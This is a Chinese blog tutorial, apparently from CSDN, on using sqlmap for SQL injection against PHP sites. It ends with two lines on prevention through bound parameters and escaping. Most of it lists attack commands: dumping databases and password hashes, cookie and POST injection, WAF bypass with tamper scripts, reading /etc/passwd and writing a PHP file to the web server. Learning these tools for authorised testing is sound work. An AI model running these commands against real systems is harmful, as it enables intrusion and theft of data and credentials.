sqlmap对php注入,sqlmap的使用(检测SQL注入的漏洞)以及防护SQL注入

SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,有一个非常棒的特性,即对检测与利用的自动化处理(数据库指纹、访问底层文件系统、执行命令)。它由Python语言开发而成,因此运行需要安装python2.7环境。

常用注入:

python sqlmap.py -u 地址 可以查看是否能对当前URL进行注入

python sqlmap.py -u 地址 -v 1 --dbs // 列举数据库列表

python sqlmap.py -u 地址 -v 1 --current-db// 显示当前数据库

python sqlmap.py -u 地址 -v 1 --users // 列举所有数据库用户

python sqlmap.py -u 地址 -v 1 --current-user // 显示当前用户

python sqlmap.py -u 地址 -v 1 -D "database_name" --tables // 列举databas的所有表

python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" --columns // 列举所有字段

python sqlmap.py -u 地址 -v 1 -D "database_name" -T "table_name" -C"columns1,columns2" –dump //导出相关字段

而且SQLMAP会将数据存储在sqlmap/output/

post注入:

先用抓包工具把post的内容拷贝到文件里面去,命名为post.txt

python sqlmap.py -r post.txt -p "user_name,pass"

-r 是指定post请求的文件

-p 是注入需要提交的参数

也可以利用下面的方式进行post注入

python sqlmap.py -u 地址 --forms //自动判断注入

python sqlmap.py -u 地址 --data "指定参数"

3.cookie注入:

如果POST跟GET请求注入都失败的话,可以尝试cookie注入试下。当使用–level 参数>=2的时候sqlmap会检查cookie的参数,先将cookie的信息从请求中复制下来

python sqlmap.py -u 地址 --cookie "参数" --tables --level 2

4.绕过waf防火墙:

假设我们在注入相关地址的时候碰到防火墙可以利用如下方式绕过防火墙

python sqlmap.py -u 地址 -v 3 --dbs --batch --tamper space2morehash.py,space2hash.py,base64encode.py,charencode.py

在sqlmap 的 tamper目录下有很多py 编码脚本自行加载

5.下面是几个常用实例:

1.读取数据库版本,当前用户,当前数据库

python sqlmap -u 地址 -f -b –current-user –current-db -v 1

2.判断当前数据库用户权限

python sqlmap -u 地址 –privileges -U 用户名 -v 1

python sqlmap -u 地址 –is-dba -U 用户名 -v 1

3.读取所有数据库用户或指定数据库用户的密码

python sqlmap -u 地址 –users –passwords -v 2

python sqlmap -u 地址 –passwords -U root -v 2

4.file-read读取web文件

python sqlmap -u 地址 –file-read “/etc/passwd” -v 2

5.file-write写入文件到web

python sqlmap -u 地址 –file-write /localhost/mm.php –file-dest

那么我们如何对SQL注入进行防护呢(这边是针对PHP的)

如果数据库驱动支持PDO或者mysqli的话可以使用绑定参数的方式来直接避免SQL注入

如果数据库驱动只支持mysql的话字符串可以使用mysql_real_escape_string来过滤,如果为其他类型的话直接强制转化(如int)这样就能避免大部分SQL注入。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值